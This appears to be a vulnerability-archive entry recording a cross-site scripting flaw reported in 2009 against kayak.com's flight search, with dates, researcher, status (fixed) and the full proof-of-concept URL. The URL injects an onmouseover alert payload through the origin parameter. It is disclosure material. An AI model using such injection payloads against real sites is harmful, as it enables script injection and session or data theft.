Security researcher bho, has submitted on 26/03/2009 a cross-site-scripting (XSS) vulnerability affecting www.kayak.com, which at the time of submission ranked 927 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 27/05/2009. It is currently fixed. |
| Date submitted: 26/03/2009 |
Date published: 27/05/2009 |
Date fixed: 12/07/2010 | Status:  FIXED |
| Author: bho |
Domain: www.kayak.com |
Category: XSS |
Pagerank: 927 |
|---|
URL: http://www.kayak.com/flights?tab=flights&oneway=n&cabin=e&travelers=1&origin=Mouse%20over%20this%22%
20onmouseover=%22alert(%27XSS%20by%20bho%27);&depart_time=a&depart_date=04%2F1%2F2009&nearbyO=y&dest
ination=Saratoga+Springs&return_time=a&return_date=04%2F8%2F2009&nearbyD=y&action=doflights |
|
Click here to view the mirror
|
|
|
| 
